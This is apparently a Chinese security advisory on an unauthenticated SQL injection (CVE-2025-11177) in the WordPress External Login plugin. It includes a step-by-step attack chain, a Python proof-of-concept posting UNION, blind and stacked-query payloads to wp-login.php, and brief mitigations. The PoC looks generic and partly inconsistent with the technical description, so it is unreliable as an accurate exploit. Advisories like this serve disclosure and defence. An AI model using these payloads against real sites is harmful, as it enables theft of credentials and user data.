CVE-2025-11177：WordPress External Login插件SQL注入漏洞

漏洞信息

漏洞编号

CVE-2025-11177

漏洞类型

SQL注入

CVSS评分

7.5 高危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

WordPress External Login插件

漏洞概述

CVE-2025-11177是WordPress External Login插件中存在的一个高危SQL注入漏洞。该漏洞影响该插件所有1.11.2及以下版本，CVSS评分为7.5分，属于高危级别。External Login插件是一款用于WordPress站点的外部认证插件，允许管理员配置外部数据库（如PostgreSQL或MSSQL）作为用户认证后端。该漏洞源于插件在处理用户登录请求时，对'log'参数（即用户名参数）未进行充分的转义处理，且未对底层SQL查询进行充分的预处理（如参数化查询），从而导致未经验证的攻击者可以在原始SQL查询中注入额外的SQL语句。由于该漏洞无需任何认证即可利用，且攻击者可以通过注入的SQL语句从数据库中提取敏感信息（如管理员凭据、用户密码哈希、个人信息等），对WordPress站点的安全性构成严重威胁。该漏洞特别针对使用PostgreSQL或MSSQL作为外部认证数据库的配置环境，因为这些数据库系统支持堆叠查询（stacked queries），使得攻击者能够执行任意SQL语句。漏洞由Wordfence安全团队的安全研究员发现并报告，已于2025年10月15日正式披露。

技术细节

该漏洞的核心问题在于External Login插件的登录处理逻辑中，db.php文件的第153行附近。插件在处理用户提交的登录请求时，直接将用户输入的'log'参数（用户名）拼接到SQL查询语句中，而没有使用参数化查询或预编译语句，也没有对用户输入进行适当的转义处理。具体而言，当WordPress站点配置了外部认证数据库（PostgreSQL或MSSQL）时，插件会构建类似如下的SQL查询：SELECT * FROM users WHERE username = '<用户输入的log参数>'。由于未对用户输入进行过滤和转义，攻击者可以通过构造特殊的输入（如' OR '1'='1' -- 或 ' UNION SELECT ... --）来改变原始查询的语义，实现SQL注入攻击。值得注意的是，该漏洞仅在配置PostgreSQL或MSSQL作为外部认证数据库时才能被利用，因为这些数据库系统支持堆叠查询，允许攻击者执行多条SQL语句。MySQL数据库默认不支持堆叠查询（取决于驱动配置），因此受影响程度较低。攻击者无需任何认证即可远程利用此漏洞，只需向登录端点发送精心构造的POST请求即可触发。由于该漏洞影响机密性（可读取数据库中的敏感信息），但不直接影响完整性和可用性，因此CVSS向量中C:H/I:N/A:N。

攻击链分析

STEP 1

步骤1：信息收集

攻击者通过搜索引擎或Shodan等工具识别运行WordPress且安装了External Login插件（版本<=1.11.2）的目标站点，并确认其使用PostgreSQL或MSSQL作为外部认证数据库。

STEP 2

步骤2：识别登录端点

攻击者定位目标站点的WordPress登录页面（通常为/wp-login.php），确认External Login插件的登录处理逻辑。

STEP 3

步骤3：构造SQL注入载荷

攻击者针对'log'参数构造SQL注入payload，如UNION注入或堆叠查询，以读取数据库中的敏感信息（如管理员密码哈希）。

STEP 4

步骤4：发送恶意请求

攻击者通过未认证的HTTP POST请求将恶意payload发送到登录端点，利用插件未充分转义用户输入的缺陷执行注入的SQL语句。

STEP 5

步骤5：提取敏感数据

成功利用后，攻击者从数据库响应中提取管理员凭据、用户密码哈希、个人信息等敏感数据。

STEP 6

步骤6：进一步渗透

攻击者利用获取的管理员密码哈希破解管理员密码，或直接利用提取的信息进行后续攻击，如账户接管、权限提升等。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

# CVE-2025-11177 PoC - External Login Plugin SQL Injection
# Vulnerability: Unauthenticated SQL Injection via 'log' parameter
# Affected: External Login plugin for WordPress <= 1.11.2
# Database: PostgreSQL or MSSQL as external authentication DB

import requests

target_url = "http://target-wordpress-site.com/wp-login.php"

# Crafted payload exploiting SQL injection in 'log' parameter
# Using UNION-based injection to extract sensitive data
payload = {
    "log": "' UNION SELECT user_login, user_pass, user_email FROM wp_users-- ",
    "pwd": "password123",
    "wp-submit": "Log In",
    "redirect_to": "http://target-wordpress-site.com/wp-admin/",
    "testcookie": "1"
}

# Send the malicious request
response = requests.post(target_url, data=payload)

# Check response for extracted data or error messages
if response.status_code == 200:
    print("[*] Response received, checking for data leakage...")
    # In successful exploitation, sensitive data may appear in response
    if "user_pass" in response.text or "ERROR" in response.text:
        print("[+] SQL Injection successful!")
        print(response.text)
else:
    print(f"[-] Request failed with status: {response.status_code}")

# Alternative: Boolean-based blind SQL injection payload
# payload_log = "admin' AND (SELECT SUBSTRING(user_pass,1,1) FROM wp_users WHERE ID=1)='a'-- "

# Alternative: Stacked query (PostgreSQL/MSSQL only)
# payload_log = "'; SELECT user_pass FROM wp_users WHERE ID=1-- "

影响范围

External Login for WordPress <= 1.11.2

防御指南

临时缓解措施

在无法立即升级插件的情况下，建议采取以下临时缓解措施：1）通过Web应用防火墙（WAF）部署SQL注入防护规则，拦截针对'log'参数的恶意请求；2）暂时禁用External Login插件的外部数据库认证功能；3）限制/wp-login.php的访问来源，仅允许可信IP地址访问；4）监控数据库日志，检测异常的SQL查询行为；5）将外部认证数据库的用户权限降至最低，限制可访问的表和数据范围。